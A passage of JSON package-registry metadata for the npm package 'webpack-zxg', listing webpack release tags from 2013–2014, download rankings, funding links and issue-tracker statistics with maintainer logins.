,{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-25T02:24:59.523Z","dependent_packages_count":0,"downloads":13,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":48.293345595762524,"dependent_repos_count":25.32799796580169,"dependent_packages_count":32.89382871786066,"stargazers_count":0.0921206343210804,"forks_count":0.5381675911031425,"average":21.429092100969818},"purl":"pkg:npm/webpack-zxg","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-zxg","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-zxg","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-zxg/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T00:09:16.443Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":929,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":363177.9151846785,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":731,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.806243272335845,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":139,"past_year_merged_pull_requests_count":578,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":430,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/latest_version","dependent_pac